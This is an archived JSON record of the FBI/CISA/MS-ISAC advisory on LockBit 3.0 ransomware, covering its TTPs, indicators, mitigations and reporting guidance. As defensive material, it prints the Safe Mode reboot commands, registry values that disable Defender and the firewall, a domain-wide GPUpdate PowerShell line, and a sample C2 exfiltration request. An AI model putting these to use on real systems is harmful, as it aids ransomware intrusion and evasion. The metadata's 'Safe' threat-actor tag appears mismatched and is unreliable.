{
	"id": "6dd41ce9-10f7-4bb5-b6d6-2872fa3ff142",
	"created_at": "2026-04-06T00:08:24.972924Z",
	"updated_at": "2026-04-10T13:11:28.920617Z",
	"deleted_at": null,
	"sha1_hash": "b06f1fbf73dfbd3ad5175bfc2ec64558b7820384",
	"title": "#StopRansomware: LockBit 3.0 | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 288481,
	"plain_text": "#StopRansomware: LockBit 3.0 | CISA\r\nPublished: 2023-03-16 · Archived: 2026-04-05 18:21:53 UTC\r\n1. Prioritize remediating known exploited vulnerabilities.\r\n2. Train users to recognize and report phishing attempts.\r\n3. Enable and enforce phishing-resistant multifactor authentication.\r\nSUMMARY\r\nNote: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories\r\nfor network defenders that detail ransomware variants and ransomware threat actors. These #StopRansomware\r\nadvisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of\r\ncompromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all\r\n#StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.\r\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the\r\nMulti-State Information Sharing \u0026 Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known\r\nLockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023.\r\nThe LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a\r\ncontinuation of previous versions of the ransomware, LockBit 2.0, and LockBit. 
Since January 2020, LockBit has\r\nfunctioned as an affiliate-based ransomware variant; affiliates deploying the LockBit RaaS use many varying\r\nTTPs and attack a wide range of businesses and critical infrastructure organizations, which can make effective\r\ncomputer network defense and mitigation challenging.\r\nThe FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the mitigations\r\nsection of this CSA to reduce the likelihood and impact of ransomware incidents.\r\nDownload the PDF version of this report: \r\nTECHNICAL DETAILS\r\nNote: This advisory uses the MITRE ATT\u0026CK® for Enterprise framework, version 12. See the MITRE ATT\u0026CK\r\nTactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT\u0026CK for Enterprise.\r\nCAPABILITIES\r\nLockBit 3.0, also known as “LockBit Black,” is more modular and evasive than its previous versions and shares\r\nsimilarities with Blackmatter and Blackcat ransomware.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\r\nPage 1 of 20\n\nLockBit 3.0 is configured upon compilation with many different options that determine the behavior of the\r\nransomware. Upon the actual execution of the ransomware within a victim environment, various arguments can be\r\nsupplied to further modify the behavior of the ransomware. For example, LockBit 3.0 accepts additional\r\narguments for specific operations in lateral movement and rebooting into Safe Mode (see LockBit Command Line\r\nparameters under Indicators of Compromise). If a LockBit affiliate does not have access to passwordless\r\nLockBit 3.0 ransomware, then a password argument is mandatory during the execution of the ransomware.\r\nLockBit 3.0 affiliates failing to enter the correct password will be unable to execute the ransomware [T1480.001]. The password is a cryptographic key which decodes the LockBit 3.0 executable. 
By protecting the code in\r\nsuch a manner, LockBit 3.0 hinders malware detection and analysis with the code being unexecutable and\r\nunreadable in its encrypted form. Signature-based detections may fail to detect the LockBit 3.0 executable as the\r\nexecutable’s encrypted portion will vary based on the cryptographic key used for encryption while also generating\r\na unique hash. When provided the correct password, LockBit 3.0 will decrypt the main component, continue to\r\ndecrypt or decompress its code, and execute the ransomware.\r\nLockBit 3.0 will only infect machines that do not have language settings matching a defined exclusion list.\r\nHowever, whether a system language is checked at runtime is determined by a configuration flag originally set at\r\ncompilation time. Languages on the exclusion list include, but are not limited to, Romanian (Moldova), Arabic\r\n(Syria), and Tatar (Russia). If a language from the exclusion list is detected [T1614.001], LockBit 3.0 will stop\r\nexecution without infecting the system.\r\nINITIAL ACCESS\r\nAffiliates deploying LockBit 3.0 ransomware gain initial access to victim networks via remote desktop protocol\r\n(RDP) exploitation [T1133], drive-by compromise [T1189], phishing campaigns [T1566], abuse of valid\r\naccounts [T1078], and exploitation of public-facing applications [T1190].\r\nEXECUTION AND INFECTION PROCESS\r\nDuring the malware routine, if privileges are not sufficient, LockBit 3.0 attempts to escalate to the required\r\nprivileges [TA0004]. 
LockBit 3.0 performs functions such as:\r\nEnumerating system information such as hostname, host configuration, domain information, local drive\r\nconfiguration, remote shares, and mounted external storage devices [T1082]\r\nTerminating processes and services [T1489]\r\nLaunching commands [TA0002]\r\nEnabling automatic logon for persistence and privilege escalation [T1547]\r\nDeleting log files, files in the recycle bin folder, and shadow copies residing on disk [T1485], [T1490]\r\nLockBit 3.0 attempts to spread across a victim network by using a preconfigured list of credentials hardcoded at\r\ncompilation time or a compromised local account with elevated privileges [T1078]. When compiled, LockBit\r\n3.0 may also enable options for spreading via Group Policy Objects and PsExec using the Server Message Block\r\n(SMB) protocol. LockBit 3.0 attempts to encrypt [T1486] data saved to any local or remote device, but skips\r\nfiles associated with core system functions.\r\nAfter files are encrypted, LockBit 3.0 drops a ransom note with the new filename \u003cRansomware ID\u003e.README.txt\r\nand changes the host’s wallpaper and icons to LockBit 3.0 branding [T1491.001]. If needed, LockBit 3.0 will\r\nsend encrypted host and bot information to a command and control (C2) server [T1027].\r\nOnce completed, LockBit 3.0 may delete itself from the disk [T1070.004] as well as any Group Policy updates\r\nthat were made, depending on which options were set at compilation time.\r\nEXFILTRATION\r\nLockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously with LockBit 2.0 [TA0010];\r\nrclone, an open-source command line cloud storage manager [T1567.002]; and publicly available file sharing\r\nservices, such as MEGA [T1567.002], to exfiltrate sensitive company data files prior to encryption. 
While\r\nrclone and many publicly available file sharing services are primarily used for legitimate purposes, they can also\r\nbe used by threat actors to aid in system compromise, network exploration, or data exfiltration. LockBit 3.0\r\naffiliates often use other publicly available file sharing services to exfiltrate data as well [T1567] (see Table 1).\r\nTable 1: Anonymous File Sharing Sites Used to Exfiltrate Data Before System Encryption\r\nFile Sharing Site\r\nhttps://www.premiumize[.]com\r\nhttps://anonfiles[.]com\r\nhttps://www.sendspace[.]com\r\nhttps://fex[.]net\r\nhttps://transfer[.]sh\r\nhttps://send.exploit[.]in\r\nLEVERAGING FREEWARE AND OPEN-SOURCE TOOLS\r\nLockBit affiliates have been observed using various freeware and open-source tools during their intrusions. These\r\ntools are used for a range of activities such as network reconnaissance, remote access and tunneling, credential\r\ndumping, and file exfiltration. Use of PowerShell and Batch scripts is observed across most intrusions, which\r\nfocus on system discovery, reconnaissance, password/credential hunting, and privilege escalation. Artifacts of\r\nprofessional penetration-testing tools such as Metasploit and Cobalt Strike have also been observed. See Table 2\r\nfor a list of legitimate freeware and open-source tools LockBit affiliates have repurposed for ransomware\r\noperations:\r\nTable 2: Freeware and Open-Source Tools Used by LockBit 3.0 Affiliates\r\nTool | Description | MITRE ATT\u0026CK ID\r\nChocolatey | Command-line package manager for Windows. | T1072\r\nFileZilla | Cross-platform File Transfer Protocol (FTP) application. | T1071.002\r\nImpacket | Collection of Python classes for working with network protocols. | S0357\r\nMEGA Ltd MegaSync | Cloud-based synchronization tool. 
| T1567.002\r\nMicrosoft Sysinternals ProcDump | Generates crash dumps. Commonly used to dump the contents of Local Security Authority Subsystem Service, LSASS.exe. | T1003.001\r\nMicrosoft Sysinternals PsExec | Execute a command-line process on a remote machine. | S0029\r\nMimikatz | Extracts credentials from system. | S0002\r\nNgrok | Legitimate remote-access tool abused to bypass victim network protections. | S0508\r\nPuTTY Link (Plink) | Can be used to automate Secure Shell (SSH) actions on Windows. | T1572\r\nRclone | Command-line program to manage cloud storage files. | S1040\r\nSoftPerfect Network Scanner | Performs network scans. | T1046\r\nSplashtop | Remote-desktop software. | T1021.001\r\nWinSCP | SSH File Transfer Protocol client for Windows. | T1048\r\nIndicators of Compromise (IOCs)\r\nThe IOCs and malware characteristics outlined below were derived from field analysis. The following samples are\r\ncurrent as of March 2023.\r\nLockBit 3.0 Black Icon\r\nLockBit 3.0 Wallpaper\r\nLockBit Command Line Parameters\r\nLockBit Parameters | Description\r\n-del | Self-delete.\r\n-gdel | Remove LockBit 3.0 group policy changes.\r\n-gspd | Spread laterally via group policy.\r\n-pass (32 character value) | (Required) Password used to launch LockBit 3.0.\r\n-path (File or path) | Only encrypts provided file or folder.\r\n-psex | Spread laterally via admin shares.\r\n-safe | Reboot host into Safe Mode.\r\n-wall | Sets LockBit 3.0 Wallpaper and prints out LockBit 3.0 ransom note.\r\nMutual Exclusion Object (Mutex) Created\r\nWhen executed, LockBit 3.0 will create the mutex, Global\\\u003cMD4 hash of machine GUID\u003e,\r\nand check to see if this mutex has already been created to avoid running more than one instance of the\r\nransomware.\r\nUAC Bypass via Elevated COM Interface\r\nLockBit 3.0 is capable of bypassing User Account Control (UAC) to execute code with elevated privileges 
via\r\nelevated Component Object Model (COM) Interface. C:\\Windows\\System32\\dllhost.exe is spawned with high\r\nintegrity with the command line GUID 3E5FC7F9-9A51-4367-9063-A120244FBEC7.\r\nFor example, %SYSTEM32%\\dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}.\r\nVolume Shadow Copy Deletion\r\nLockBit 3.0 uses Windows Management Instrumentation (WMI) to identify and delete Volume Shadow Copies.\r\nLockBit 3.0 uses select * from Win32_ShadowCopy to query for Volume Shadow copies, Win32_ShadowCopy.ID\r\nto obtain the ID of the shadow copy, and DeleteInstance to delete any shadow copies.\r\nRegistry Artifacts\r\nLockBit 3.0 Icon\r\nRegistry Key | Value | Data\r\nHKCR\\.\u003cMalware Extension\u003e | (Default) | \u003cMalware Extension\u003e\r\nHKCR\\\u003cMalware Extension\u003e\\DefaultIcon | (Default) | C:\\ProgramData\\\u003cMalware Extension\u003e.ico\r\nLockBit 3.0 Wallpaper\r\nRegistry Key | Value | Data\r\nHKCU\\Control Panel\\Desktop\\WallPaper | (Default) | C:\\ProgramData\\\u003cMalware Extension\u003e.bmp\r\nDisable Privacy Settings Experience\r\nRegistry Key | Value | Data\r\nSOFTWARE\\Policies\\Microsoft\\Windows\\OOBE | DisablePrivacyExperience | 0\r\nEnable Automatic Logon\r\nRegistry Key | Value | Data\r\nSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon | AutoAdminLogon | 1\r\nSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon | DefaultUserName | \u003cusername\u003e\r\nSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon | DefaultDomainName | \u003cdomain name\u003e\r\nSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon | DefaultPassword | \u003cpassword\u003e\r\nDisable and Clear Windows Event Logs\r\nRegistry Key | Value | Data\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\* | Enabled | 0\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\*\\ChannelAccess | ChannelAccess | AO:BAG:SYD:(A;;0x1;;;SY)(A;;0x5;;;BA)(A;;0x1;;;LA)\r\nRansom Locations\r\nLockBit 3.0 File Path Locations\r\nADMIN$\\Temp\\\u003cLockBit3.0 
Filename\u003e.exe\r\n%SystemRoot%\\Temp\\\u003cLockBit3.0 Filename\u003e.exe\r\n\\\u003cDomain Name\u003e\\sysvol\\\u003cDomain Name\u003e\\scripts\\\u003cLockbit 3.0 Filename\u003e.exe (Domain Controller)\r\nSafe Mode Launch Commands\r\nLockBit 3.0 has a Safe Mode feature to circumvent endpoint antivirus and detection. Depending upon the host\r\noperating system, the following command is launched to reboot the system to Safe Mode with Networking:\r\nOperating System | Safe Mode with Networking command\r\nVista and newer | bcdedit /set {current} safeboot network\r\nPre-Vista | bootcfg /raw /a /safeboot:network /id 1\r\nOperating System | Disable Safe mode reboot\r\nVista and newer | bcdedit /deletevalue {current} safeboot\r\nPre-Vista | bootcfg /raw /fastdetect /id 1\r\nGroup Policy Artifacts\r\nThe following are Group Policy Extensible Markup Language (XML) files identified after a LockBit 3.0\r\ninfection:\r\nNetworkShares.xml\r\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\r\nServices.xml stops and disables services on the Active Directory (AD) hosts.\r\nServices.xml\r\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\r\nname=\"MSSQLFDLauncher\" image=\"4\" changed=\"%s\" uid=\"%s\" userContext=\"0\" removePolicy=\"0\"\r\ndisabled=\"0\"\u003e\r\nRegistry.pol\r\nThe following registry configuration changes values for the Group Policy refresh time, disable SmartScreen, and\r\ndisable Windows Defender.\r\nRegistry Key | Registry Value | Value type | Data\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System | GroupPolicyRefreshTimeDC | REG_DWORD | 1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System | GroupPolicyRefreshTimeOffsetDC | REG_DWORD | 1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Window
s\\System | GroupPolicyRefreshTime | REG_DWORD | 1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System | GroupPolicyRefreshTimeOffset | REG_DWORD | 1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System | EnableSmartScreen | REG_DWORD | 0\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System | **del.ShellSmartScreenLevel | REG_SZ | \r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender | DisableAntiSpyware | REG_DWORD | 1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender | DisableRoutinelyTakingAction | REG_DWORD | 1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection | DisableRealtimeMonitoring | REG_DWORD | 1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection | DisableBehaviorMonitoring | REG_DWORD | 1\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet | SubmitSamplesConsent | REG_DWORD | 2\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet | SpynetReporting | REG_DWORD | 0\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile | EnableFirewall | REG_DWORD | 0\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile | EnableFirewall | REG_DWORD | 0\r\nForce GPUpdate\r\nOnce new group policies are added, a PowerShell command using Group Policy update (GPUpdate) applies the\r\nnew group policy changes to all computers on the AD domain.\r\nForce GPUpdate Powershell Command\r\npowershell Get-ADComputer -filter * -Searchbase '%s' | Foreach-Object { Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}\r\nServices Killed\r\nvss sql svc$\r\nmemtas mepocs msexchange\r\nsophos veeam backup\r\nGxVss GxBlr GxFWD\r\nGxCVD GxCIMgr\r\nProcesses Killed\r\nsql oracle ocssd\r\ndbsnmp synctime 
agntsvc\r\nisqlplussvc xfssvccon mydesktopservice\r\nocautoupds encsvc firefox\r\ntbirdconfig mydesktopqos ocomm\r\ndbeng50 sqbcoreservice excel\r\ninfopath msaccess mspu\r\nonenote outlook powerpnt\r\nsteam thebat thunderbird\r\nvisio winword wordpad\r\nnotepad\r\nLockBit 3.0 Ransom Note\r\n~~~ LockBit 3.0 the world's fastest and most stable ransomware from 2019~~~\r\n\u003e\u003e\u003e\u003e\u003e Your data is stolen and encrypted.\r\nIf you don't pay the ransom, the data will be published on our TOR darknet sites. Keep in mind that once your data\r\nappears on our leak site, it could be bought by your competitors at any second, so don't hesitate for a long time.\r\nThe sooner you pay the ransom, the sooner your company will be safe.\r\nNetwork Connections\r\nIf configured, LockBit 3.0 will send two HTTP POST requests to one of the C2 servers. Information about the\r\nvictim host and bot are encrypted with an Advanced Encryption Standard (AES) key and encoded in Base64.\r\nExample of HTTP POST request\r\nPOST \u003cLockbit C2\u003e/?7F6Da=u5a0TdP0\u0026Aojq=\u0026NtN1W=OuoaovMvrVJSmPNaA5\u0026fckp9=FCYyT6b7kdyeEXywS8I8 HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: text/plain\r\nUser-Agent: Safari/537.36 \u003cLockbit User Agent String\u003e\r\nHost: \u003cLockbit C2\u003e\r\nConnection: Keep-Alive\r\n\r\nLIWy=RJ51lB5GM\u0026a4OuN=\u003cLockbit ID\u003e\u0026LoSyE3=8SZ1hdlhzld4\u0026DHnd99T=rTx9xGlInO6X0zWW\u00262D6=Bokz\u0026T1guL=MtRZsFCRMKyBmfmqI\u00266SF3g=JPDt9lfJIQ\u0026wQadZP=\u003cBase64 encrypted data\u003eXni=AboZOXwUw\u00262rQnM4=94L\u00260b=ZfKv7c\u0026NO1d=M2kJlyus\u0026AgbDTb=xwSpba\u00268sr=EndL4n0HVZjxPR\u0026m4ZhTTH=sBVnPY\u0026xZDiygN=cU1pAwKEztU\u0026=5q55aFIAfTVQWTEm\u00264sXwVWcyhy=l68FrIdBESIvfCkvYl\r\nExample of information found in encrypted data\r\n{\r\n\"bot_version\":\"X\",\r\n\"bot_id\":\"X\",\r\n\"bot_company\":\"X\", 
\"host_hostname\":\"X\",\r\n\"host_user\":\"X\",\r\n\"host_os\":\"X\",\r\n\"host_domain\":\"X\",\r\n\"host_arch\":\"X\",\r\n\"host_lang\":\"X\",\r\n\"disks_info\":[\r\n{\r\n\"disk_name\":\"X\",\r\n\"disk_size\":\"XXXX\",\r\n\"free_size\":\"XXXXX\"\r\n}\r\n]\r\n}\r\nUser Agent Strings\r\nMozilla/5.0 (Windows NT 6.1)\r\nAppleWebKit/587.38 (KHTML, like Gecko)\r\nChrome/91.0.4472.77\r\nSafari/537.36\r\nEdge/91.0.864.37\r\nFirefox/89.0\r\nGecko/20100101\r\nMITRE ATT\u0026CK TECHNIQUES\r\nSee Table 3 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to\r\nthe MITRE ATT\u0026CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT\u0026CK Mapping\r\nGuide.\r\nInitial Access\r\nTechnique Title | ID | Use\r\nValid Accounts | T1078 | LockBit 3.0 actors obtain and abuse credentials of existing accounts as a means of gaining initial access.\r\nExploit External Remote Services | T1133 | LockBit 3.0 actors exploit RDP to gain access to victim networks.\r\nDrive-by Compromise | T1189 | LockBit 3.0 actors gain access to a system through a user visiting a website over the normal course of browsing.\r\nExploit Public-Facing Application | T1190 | LockBit 3.0 actors exploit vulnerabilities in internet-facing systems to gain access to victims’ systems.\r\nPhishing | T1566 | LockBit 3.0 actors use phishing and spearphishing to gain access to victims' networks.\r\nExecution\r\nTechnique Title | ID | Use\r\nExecution | TA0002 | LockBit 3.0 launches commands during its execution.\r\nSoftware Deployment Tools | T1072 | LockBit 3.0 uses Chocolatey, a command-line package manager for Windows. 
\r\nPersistence\r\nTechnique Title | ID | Use\r\nValid Accounts | T1078 | LockBit 3.0 uses a compromised user account to maintain persistence on the target network.\r\nBoot or Logon Autostart Execution | T1547 | LockBit 3.0 enables automatic logon for persistence.\r\nPrivilege Escalation\r\nTechnique Title | ID | Use\r\nPrivilege Escalation | TA0004 | LockBit 3.0 will attempt to escalate to the required privileges if current account privileges are insufficient.\r\nBoot or Logon Autostart Execution | T1547 | LockBit 3.0 enables automatic logon for privilege escalation.\r\nDefense Evasion\r\nTechnique Title | ID | Use\r\nObfuscated Files or Information | T1027 | LockBit 3.0 will send encrypted host and bot information to its C2 servers.\r\nIndicator Removal: File Deletion | T1070.004 | LockBit 3.0 will delete itself from the disk.\r\nExecution Guardrails: Environmental Keying | T1480.001 | LockBit 3.0 will only decrypt the main component or continue to decrypt and/or decompress data if the correct password is entered.\r\nCredential Access\r\nTechnique Title | ID | Use\r\nOS Credential Dumping: LSASS Memory | T1003.001 | LockBit 3.0 uses Microsoft Sysinternals ProcDump to dump the contents of LSASS.exe.\r\nDiscovery\r\nTechnique Title | ID | Use\r\nNetwork Service Discovery | T1046 | LockBit 3.0 uses SoftPerfect Network Scanner to scan target networks.\r\nSystem Information Discovery | T1082 | LockBit 3.0 will enumerate system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices. 
\r\nSystem Location Discovery: System Language Discovery | T1614.001 | LockBit 3.0 will not infect machines with language settings that match a defined exclusion list.\r\nLateral Movement\r\nTechnique Title | ID | Use\r\nRemote Services: Remote Desktop Protocol | T1021.001 | LockBit 3.0 uses Splashtop remote-desktop software to facilitate lateral movement.\r\nCommand and Control\r\nTechnique Title | ID | Use\r\nApplication Layer Protocol: File Transfer Protocols | T1071.002 | LockBit 3.0 uses FileZilla for C2.\r\nProtocol Tunnel | T1572 | LockBit 3.0 uses Plink to automate SSH actions on Windows.\r\nExfiltration\r\nTechnique Title | ID | Use\r\nExfiltration | TA0010 | LockBit 3.0 uses Stealbit, a custom exfiltration tool first used with LockBit 2.0, to steal data from a target network.\r\nExfiltration Over Web Service | T1567 | LockBit 3.0 uses publicly available file sharing services to exfiltrate a target’s data.\r\nExfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | LockBit 3.0 actors use (1) rclone, an open source command line cloud storage manager to exfiltrate and (2) MEGA, a publicly available file sharing service for data exfiltration.\r\nImpact\r\nTechnique Title | ID | Use\r\nData Destruction | T1485 | LockBit 3.0 deletes log files and empties the recycle bin.\r\nData Encrypted for Impact | T1486 | LockBit 3.0 encrypts data on target systems to interrupt availability to system and network resources.\r\nService Stop | T1489 | LockBit 3.0 terminates processes and services.\r\nInhibit System Recovery | T1490 | LockBit 3.0 deletes volume shadow copies residing on disk.\r\nDefacement: Internal Defacement | T1491.001 | LockBit 3.0 changes the host system’s wallpaper and icons to the LockBit 3.0 wallpaper and icons, respectively. 
\r\nMITIGATIONS\r\nThe FBI, CISA, and the MS-ISAC recommend organizations implement the mitigations below to improve your\r\norganization’s cybersecurity posture on the basis of LockBit 3.0’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and\r\nTechnology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST\r\nrecommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks\r\nand guidance to protect against the most common and impactful TTPs. Visit CISA’s Cross-Sector Cybersecurity\r\nPerformance Goals for more information on the CPGs, including additional recommended baseline protections.\r\nImplement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and\r\nservers [CPG 7.3] in a physically separate, segmented, and secure location (e.g., hard drive, storage device,\r\nthe cloud).\r\nRequire all accounts with password logins (e.g., service account, admin accounts, and domain admin\r\naccounts) to comply with National Institute for Standards and Technology (NIST) standards for developing\r\nand managing password policies [CPG 3.4]:\r\n  Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\r\n  Store passwords in hashed format using industry-recognized password managers.\r\n  Add password user “salts” to shared login credentials.\r\n  Avoid reusing passwords.\r\n  Implement multiple failed login attempt account lockouts [CPG 1.1].\r\n  Disable password “hints”.\r\n  Refrain from requiring password changes more frequently than once per year. 
Note: NIST guidance\r\nsuggests favoring longer passwords instead of requiring regular and frequent password resets.\r\nFrequent password resets are more likely to result in users developing password “patterns” cyber\r\ncriminals can easily decipher.\r\nRequire administrator credentials to install software.\r\nRequire phishing-resistant multifactor authentication [CPG 1.3] for all services to the extent possible,\r\nparticularly for webmail, virtual private networks, and accounts that access critical systems.\r\nKeep all operating systems, software, and firmware up to date. Timely patching is one of the most\r\nefficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\r\nSegment networks [CPG 8.1] to prevent the spread of ransomware. Network segmentation can help\r\nprevent the spread of ransomware by controlling traffic flows between—and access to—various\r\nsubnetworks and by restricting adversary lateral movement.\r\nIdentify, detect, and investigate abnormal activity and potential traversal of the indicated\r\nransomware with a network monitoring tool. 
To aid in detecting the ransomware, implement a tool\r\nthat logs and reports all network traffic, including lateral movement activity on a network [CPG 5.1].\r\nEndpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as\r\nthey have insight into common and uncommon network connections for each host.\r\nInstall, regularly update, and enable real-time detection for antivirus software on all hosts.\r\nReview domain controllers, servers, workstations, and active directories for new and/or unrecognized\r\naccounts.\r\nAudit user accounts with administrative privileges and configure access controls according to the\r\nprinciple of least privilege [CPG 1.5].\r\nDisable unused ports.\r\nConsider adding an email banner to emails [CPG 8.3] received from outside your organization.\r\nDisable hyperlinks in received emails.\r\nImplement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the\r\nprinciple of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy\r\nis set in place to automatically disable admin accounts at the Active Directory level when the account is not\r\nin direct need. Individual users may submit their requests through an automated process that grants them\r\naccess to a specified system for a set timeframe when they need to support the completion of a certain task.\r\nDisable command-line and scripting activities and permissions. Privilege escalation and lateral\r\nmovement often depend on software utilities running from the command line. 
If threat actors are not able\r\nto run these tools, they will have difficulty escalating privileges and/or moving laterally.\r\nMaintain offline backups of data, and regularly maintain backup and restoration [CPG 7.3]. By\r\ninstituting this practice, the organization ensures it will not be severely interrupted or left with only\r\nirretrievable data.\r\nEnsure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire\r\norganization’s data infrastructure [CPG 3.3].\r\nVALIDATE SECURITY CONTROLS\r\nIn addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend exercising, testing, and\r\nvalidating your organization's security program against the threat behaviors mapped to the MITRE ATT\u0026CK for\r\nEnterprise framework in this advisory. The FBI, CISA, and the MS-ISAC authoring agencies recommend testing\r\nyour existing security controls inventory to assess how they perform against the ATT\u0026CK techniques described in\r\nthis advisory.\r\nTo get started:\r\n1. Select an ATT\u0026CK technique described in this advisory (see Table 3).\r\n2. Align your security technologies against the technique.\r\n3. Test your technologies against the technique.\r\n4. Analyze your detection and prevention technologies' performance.\r\n5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.\r\n6. 
Tune your security program, including people, processes, and technologies, based on the data generated by\r\nthis process.\r\nThe FBI, CISA, and the MS-ISAC recommend continually testing your security program at scale and in a\r\nproduction environment to ensure optimal performance against the MITRE ATT\u0026CK techniques identified in this\r\nadvisory.\r\nRESOURCES\r\nStopransomware.gov is a whole-of-government approach that gives one central location for ransomware\r\nresources and alerts.\r\nResource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center\r\n(MS-ISAC) Joint Ransomware Guide.\r\nNo-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.\r\nREPORTING\r\nThe FBI is seeking any information that can be legally shared, including:\r\nBoundary logs showing communication to and from foreign IP addresses\r\nSample ransom note\r\nCommunications with LockBit 3.0 actors\r\nBitcoin wallet information\r\nDecryptor files\r\nBenign sample of an encrypted file\r\nThe FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not guarantee victim files will\r\nbe recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage\r\nother criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of\r\nwhether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report\r\nransomware incidents to a local FBI Field Office or CISA at report@cisa.gov. State, local, tribal, and territorial\r\n(SLTT) government entities can also report to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).\r\nDISCLAIMER\r\nThe information in this report is being provided “as is” for informational purposes only. 
The FBI, CISA, and the\r\nMS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to\r\nspecific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does\r\nnot constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.\r\nYour feedback is important. Please take a few minutes to share your opinions on this product through an\r\nanonymous Product Feedback Survey.\r\nSource: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a"
	],
	"report_names": [
		"aa23-075a"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434104,
	"ts_updated_at": 1775826688,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b06f1fbf73dfbd3ad5175bfc2ec64558b7820384.pdf",
		"text": "https://archive.orkl.eu/b06f1fbf73dfbd3ad5175bfc2ec64558b7820384.txt",
		"img": "https://archive.orkl.eu/b06f1fbf73dfbd3ad5175bfc2ec64558b7820384.jpg"
	}
}